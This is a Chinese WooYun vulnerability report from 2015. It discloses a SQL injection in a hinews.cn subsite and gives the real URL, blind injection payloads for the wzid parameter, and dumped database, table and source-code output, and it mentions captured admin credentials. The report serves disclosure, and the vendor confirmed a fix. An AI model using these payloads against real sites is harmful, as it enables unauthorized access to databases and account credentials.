当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0147830
漏洞标题:
南海网某分站SQL注射[可读取代码]
相关厂商:
南海网
漏洞作者:
秦风
提交时间:
2015-10-19 18:04
修复时间:
2015-12-04 18:56
公开时间:
2015-12-04 18:56
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
11
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

南海网分站

详细说明:

证券导报网络版

homepage.jpg

漏洞证明:

target URL:
http://zqdb2.hinews.cn/php/pages.php?wzid=1442
无单引号过滤

injectpoint.jpg


Parameter: wzid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: wzid=1442 AND 7171=7171
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wzid=1442 AND (SELECT * FROM (SELECT(SLEEP(5)))YtRZ)
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] dbzqdb
[*] information_schema
[*] test
.......
back-end DBMS: MySQL 5.0.12
Database: dbzqdb
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| tb_wenzhang | 8746    |
| tb_lanmu    | 4936    |
| tb_huifu    | 2867    |
| tb_tiezi    | 1076    |
| tb_danyuan  | 267     |
| tb_yongh2   | 26      |
| tb_pinglun  | 25      |
| tb_daohang  | 24      |
| tb_daima    | 8       |
| tb_yongh    | 8       |
.................


从 tb_daima这张表可读取代码

Database: dbzqdb
Table: tb_daima
[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| cmingch | varchar(50) |
| cneir   | text        |
| dzhid   | datetime    |
| nxuh    | int(11)     |
+---------+-------------+


代码片段(读取比较慢...-_-||)

<?php    include_once("../web_mysql.php");    inclu
de_once("../fun_danyuan.php");    include_once("../fun_dianj.php") ;      functi
on banshu(){      $date = '{%%ps_date%%}' ;      $lcsql = "select count(*) as 'cnt' from tb_lanmu where driq='".$date
."'" ;      global $db ;      $result_list = $db->sql_query($lcsql);      if(!$r
esult_list)        die("获???......


admin的账号密码:

adminpass.jpg

修复方案:

你懂的 ^_^

版权声明:转载请注明来源 秦风@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-10-20 18:54

厂商回复:

已处理。

最新状态:

暂无